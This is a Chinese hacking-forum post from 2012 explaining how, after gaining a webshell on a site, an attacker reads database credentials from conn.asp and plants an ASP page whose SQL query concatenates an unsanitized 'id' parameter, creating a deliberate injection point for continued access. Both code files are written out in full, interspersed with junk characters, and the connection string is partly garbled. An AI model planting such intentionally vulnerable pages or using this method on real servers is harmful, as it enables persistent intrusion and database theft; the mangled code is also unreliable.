中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
- F& `# O! X) _# I1 y. _: lASP/Visual Basic代码
2 R9 N& V: r) h% J<!--#include file="xx.asp"-->   
/ F8 X9 ?  L; A' Q% E, y<%    0 ]6 r7 Q) V) G
set rs=server.createobject("ADODB.recordset")   
4 K" {: z/ v2 ?! m" `! Vid = request("id")    9 X) C" t% i1 W) c' z  m& ?
strSQL = "select * from admin where id=" & id   
# ~8 X/ S% d& q3 V/ u: zrs.open strSQL,conn,1,3    6 f: x/ F2 Q$ a* A3 l% d& m
rs.close    5 J0 _$ O5 e: n
%>  
3 [( X: m, c, i3 r2 j3 u把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!) O" V, N; e  \+ N, X& v6 O0 ?
然后就要构造一个连接数据库的文件了,代码如下:
8 H% y' p  g, F3 s7 Y& P: |ASP/Visual Basic代码
( b% Z  a5 o( m* h% {' S" p2 j<%            
5 H) u- c/ r' e, t/ g) `. s' cstrSQLServerName = "000.000.000.000"     '服务器名称或地址    - T8 r# {( o) g
strSQLDBUserName = "sqlname"         '数据库帐号    $ I% P: p9 [0 F! i; Q/ u0 @
strSQLDBPassword = "sqlpass"         '数据库密码    - ^  Q9 g( f) g: w$ y; V
strSQLDBName = "sqldataname"           '数据库名称   
: S+ o& I8 \0 \" e+ {- DSet conn = Server.CreateObject("ADODB.Connection")    - a. a& t% k. C( d! X4 ~" `& o
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   2 Z  D/ e* s0 l2 s: N& m
conn.open strCon   
6 F1 T" ~: [, h# X2 M$ U$ C! Q& p4 M+ p%>  
4 e/ |9 z* Y" U- e4 [6 a6 i: |) ?; Z这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功9 h0 U5 |3 [9 [$ v+ ^





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2